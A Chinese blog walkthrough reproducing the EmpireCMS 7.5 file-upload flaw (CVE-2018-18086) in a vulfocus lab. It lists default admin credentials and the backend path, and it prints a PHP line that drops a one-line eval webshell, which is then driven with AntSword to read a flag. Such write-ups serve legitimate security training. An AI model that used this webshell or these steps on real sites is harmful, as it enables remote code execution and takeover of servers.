当前位置: 首页 > news >正文

vulfocus-empirecms 文件上传 (CVE-2018-18086)漏洞复现详细教程

关于本地化搭建vulfocus靶场的师傅可以参考我置顶文章

KALI搭建log4j2靶场及漏洞复现全流程-CSDN博客https://blog.csdn.net/2301_78255681/article/details/147286844

一、漏洞描述:

EmpireCMS(帝国网站管理系统)是一套内容管理系统(CMS)。 EmpireCMS 7.5版本中的e/class/moddofun.php文件的‘LoadInMod’函数存在安全漏洞。攻击者可利用该漏洞上传任意文件。 密码:admin/123456 后台路径:/empirecms/e/admin

二、漏洞复现:

1、来到vulfocus镜像管理界面,下载靶场环境,也可以在vulfocus官网直接启动靶场环境

Vulfocus 漏洞威胁分析平台https://vulfocus.cn/#/dashboard

2、来到后台页面

3、登录进入后台,账号密码admin/123456

4、寻找发现文件上传地点

5、导入木马文件666.php.mod,使他创建一个caidao.php的木马文件

<?php file_put_contents("caidao.php","<?php @eval(\$_POST[cmd]); ?>");?>

6、访问是否上传成功

7、使用蚁剑测试连接

8、在tmp目录下成功找到flag

相关文章:

  • 通过C# 将Excel表格转换为图片(JPG/ PNG)
  • 第T7周:咖啡豆识别
  • day1-小白学习JAVA---JDK安装和环境变量配置(mac版)
  • AIGC-几款本地生活服务智能体完整指令直接用(DeepSeek,豆包,千问,Kimi,GPT)
  • C#核心笔记——(六)框架基础
  • 《AI大模型应知应会100篇》第25篇:Few-shot与Zero-shot使用方法对比
  • top100 (6-10)
  • 实验五 内存管理实验
  • 使用MQTT协议实现VISION如何与Node-red数据双向通信
  • Excalidraw:一个免费开源的白板绘图工具
  • 电流模式控制学习
  • Java课程内容大纲(附重点与考试方向)
  • Explorer++:轻量级高效文件管理器!!
  • 【AI News | 20250418】每日AI进展
  • 【从零实现高并发内存池】申请、释放内存过程联调测试 与 大于256KB内存申请全攻略
  • 基于用户的协同过滤推荐系统实战项目
  • 【Linux系统篇】:System V IPC核心技术解析---从共享内存到消息队列与信号量
  • Python 高阶函数:日志的高级用法
  • oracle数据库认证大师ocm
  • 成人大学报考-助你跨越信息鸿沟
  • 一中国公民在日本滑雪场意外死亡,我领馆发布提醒
  • 云南昆明市副市长戴惠明已任市委常委、秘书长
  • 为博眼球竟编造一女孩被活埋,公安机关公布10起谣言案件
  • 福特预期6月美国市场涨价,机构称加税让每辆汽车成本至少增加数千美元
  • 中国金茂与建发国际联合收购北京丰台地块,总价18.4亿元
  • 四川内江市市中区发生3.8级地震,震源深度10千米